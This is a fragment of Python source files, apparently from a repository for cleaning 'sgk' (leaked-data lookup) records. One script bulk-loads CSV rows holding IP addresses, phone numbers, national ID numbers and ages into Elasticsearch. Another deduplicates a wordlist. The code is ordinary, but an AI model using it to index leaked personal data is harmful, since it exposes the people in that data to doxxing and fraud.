24 | u"ip地址": line[4].decode('utf8'),
25 | u"号码": line[5].decode('utf8'),
26 | u"身份证号": line[6].decode('utf8'),
27 | u"年龄": line[7].decode('utf8'),
28 | u"月份": line[8].decode('utf8'),
29 | u"年份": line[9].decode('utf8'),
30 | u"姓氏": line[10].decode('utf8')
31 | }
32 | }
33 | i += 1
34 | actions.append(action)
35 | if len(actions) == 500:
36 | helpers.bulk(es, actions)
37 | del actions[0:len(actions)]
38 | if len(actions) > 0:
39 | helpers.bulk(es, actions)
40 | except:
41 | traceback.print_exc()
42 |
43 |
44 | if __name__ == '__main__':
45 | csv_import()
--------------------------------------------------------------------------------
/sgk数据清洗/quchong.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
2 |
3 | import sys, re, os
4 |
5 | def getDictList(dict):
6 | regx = '''[\w\~`\!\@\#\$\%\^\&\*\(\)\_\-\+\=\[\]\{\}\:\;\,\.\/\<\>\?]+'''
7 | with open(dict) as f:
8 | data = f.read()
9 | return re.findall(regx, data)
10 |
11 | def rmdp(dictList):
12 | return list(set(dictList))
13 |
14 | def fileSave(dictRmdp, out):
15 | with open(out, 'a') as f:
16 | for line in dictRmdp:
17 | f.write(line + '\n')
18 |
19 | def main():
20 | try:
21 | dict = sys.argv[1].strip()
22 | out = sys.argv[2].strip()
23 | except Exception, e:
24 | print 'error:', e
25 | me = os.path.basename(__file__)
26 | print 'usage: %s